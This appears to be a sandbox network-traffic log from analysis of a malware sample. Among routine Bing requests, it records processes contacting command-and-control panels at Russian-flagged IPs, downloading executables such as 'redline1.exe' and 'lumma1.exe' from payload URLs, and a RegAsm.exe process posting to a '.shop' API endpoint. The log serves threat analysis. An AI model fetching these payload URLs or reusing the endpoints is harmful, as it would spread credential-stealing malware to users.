                                                                                      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
                                                                                      Remote address:
                                                                                      204.79.197.237:443
                                                                                      Request
                                                                                      GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
                                                                                      host: g.bing.com
                                                                                      accept-encoding: gzip, deflate
                                                                                      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                      Response
                                                                                      HTTP/2.0 204
                                                                                      cache-control: no-cache, must-revalidate
                                                                                      pragma: no-cache
                                                                                      expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                      set-cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; domain=.bing.com; expires=Sun, 08-Jun-2025 18:01:05 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      access-control-allow-origin: *
                                                                                      x-cache: CONFIG_NOCACHE
                                                                                      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                      x-msedge-ref: Ref A: 0BB11B6AB44B4A74887A6D8EC763E412 Ref B: LON04EDGE1007 Ref C: 2024-05-14T18:01:05Z
                                                                                      date: Tue, 14 May 2024 18:01:05 GMT
                                                                                    • flag-us
                                                                                      GET
                                                                                      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
                                                                                      Remote address:
                                                                                      204.79.197.237:443
                                                                                      Request
                                                                                      GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
                                                                                      host: g.bing.com
                                                                                      accept-encoding: gzip, deflate
                                                                                      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                      cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82
                                                                                      Response
                                                                                      HTTP/2.0 204
                                                                                      cache-control: no-cache, must-revalidate
                                                                                      pragma: no-cache
                                                                                      expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                      set-cookie: MSPTC=_Hg3lxl00HZWh1dOOWUGdh2_X-oU0PvKQ2hTPm9YAWU; domain=.bing.com; expires=Sun, 08-Jun-2025 18:01:06 GMT; path=/; Partitioned; secure; SameSite=None
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      access-control-allow-origin: *
                                                                                      x-cache: CONFIG_NOCACHE
                                                                                      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                      x-msedge-ref: Ref A: F06A9B3BC70848C294E87DB2099AFE98 Ref B: LON04EDGE1007 Ref C: 2024-05-14T18:01:06Z
                                                                                      date: Tue, 14 May 2024 18:01:05 GMT
                                                                                    • flag-be
                                                                                      GET
                                                                                      https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038
                                                                                      Remote address:
                                                                                      88.221.83.193:443
                                                                                      Request
                                                                                      GET /aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038 HTTP/2.0
                                                                                      host: www.bing.com
                                                                                      accept-encoding: gzip, deflate
                                                                                      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                      cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31
                                                                                      Response
                                                                                      HTTP/2.0 200
                                                                                      cache-control: private,no-store
                                                                                      pragma: no-cache
                                                                                      vary: Origin
                                                                                      p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                                                                                      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                      x-msedge-ref: Ref A: 2320BD19D8E74E2EB68F8ED06D9AAA52 Ref B: LON212050704007 Ref C: 2024-05-14T18:01:05Z
                                                                                      content-length: 0
                                                                                      date: Tue, 14 May 2024 18:01:05 GMT
                                                                                      set-cookie: _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82; path=/; httponly; domain=bing.com
                                                                                      set-cookie: MUIDB=09CF9A125C726EDC1C088E6D5D926F31; path=/; httponly; expires=Sun, 08-Jun-2025 18:01:05 GMT
                                                                                      alt-svc: h3=":443"; ma=93600
                                                                                      x-cdn-traceid: 0.bd53dd58.1715709665.303eeb88
                                                                                    • flag-us
                                                                                      DNS
                                                                                      196.249.167.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      196.249.167.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      240.197.17.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      240.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      240.197.17.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-17-197-240deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      237.197.79.204.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      237.197.79.204.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      95.221.229.192.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      14.160.190.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      14.160.190.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      193.83.221.88.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      193.83.221.88.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      193.83.221.88.in-addr.arpa
                                                                                      IN PTR
                                                                                      a88-221-83-193deploystaticakamaitechnologiescom
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.141/go34ko8/index.php
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Request
                                                                                      POST /go34ko8/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.141
                                                                                      Content-Length: 4
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Refresh: 0; url = Login.php
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.141/go34ko8/index.php
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Request
                                                                                      POST /go34ko8/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.141
                                                                                      Content-Length: 158
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-be
                                                                                      GET
                                                                                      https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                                                                                      Remote address:
                                                                                      88.221.83.193:443
                                                                                      Request
                                                                                      GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
                                                                                      host: www.bing.com
                                                                                      accept: */*
                                                                                      cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82; MSPTC=_Hg3lxl00HZWh1dOOWUGdh2_X-oU0PvKQ2hTPm9YAWU; MUIDB=09CF9A125C726EDC1C088E6D5D926F31
                                                                                      accept-encoding: gzip, deflate, br
                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                      Response
                                                                                      HTTP/2.0 200
                                                                                      cache-control: public, max-age=2592000
                                                                                      content-type: image/png
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-headers: *
                                                                                      access-control-allow-methods: GET, POST, OPTIONS
                                                                                      timing-allow-origin: *
                                                                                      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                      content-length: 1107
                                                                                      date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      alt-svc: h3=":443"; ma=93600
                                                                                      x-cdn-traceid: 0.bd53dd58.1715709667.303ef1a8
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/cost/sarra.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /cost/sarra.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2464768
                                                                                      Last-Modified: Tue, 14 May 2024 17:57:12 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "6643a5f8-259c00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/mine/amers.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /mine/amers.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/cost/random.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /cost/random.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                    • flag-us
                                                                                      DNS
                                                                                      88.156.103.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      88.156.103.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      141.96.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      141.96.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      7.96.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      7.96.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      133.211.185.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      133.211.185.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 4
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Refresh: 0; url = Login.php
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 158
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/alex.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/alex.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2831872
                                                                                      Last-Modified: Sat, 11 May 2024 20:05:26 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fcf86-2b3600"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/gold.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/gold.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:29 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 412448
                                                                                      Last-Modified: Sat, 11 May 2024 20:05:30 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fcf8a-64b20"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/redline1.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/redline1.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:30 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 311296
                                                                                      Last-Modified: Sat, 11 May 2024 20:05:37 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fcf91-4c000"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/swizzhis.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/swizzhis.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:34 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 1084416
                                                                                      Last-Modified: Sat, 11 May 2024 20:43:13 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fd861-108c00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/lumma1.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/lumma1.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:36 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 1274880
                                                                                      Last-Modified: Sat, 11 May 2024 20:48:32 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fd9a0-137400"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:39 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-us
                                                                                      DNS
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      zippyfinickysofwps.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      zippyfinickysofwps.shop
                                                                                      IN A
                                                                                      Response
                                                                                      zippyfinickysofwps.shop
                                                                                      IN A
                                                                                      104.21.39.216
                                                                                      zippyfinickysofwps.shop
                                                                                      IN A
                                                                                      172.67.148.231
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://zippyfinickysofwps.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.39.216:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: zippyfinickysofwps.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:31 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=c3uja3c4omjs0bdbs4cpbj1ffg; expires=Sat, 07-Sep-2024 11:48:10 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
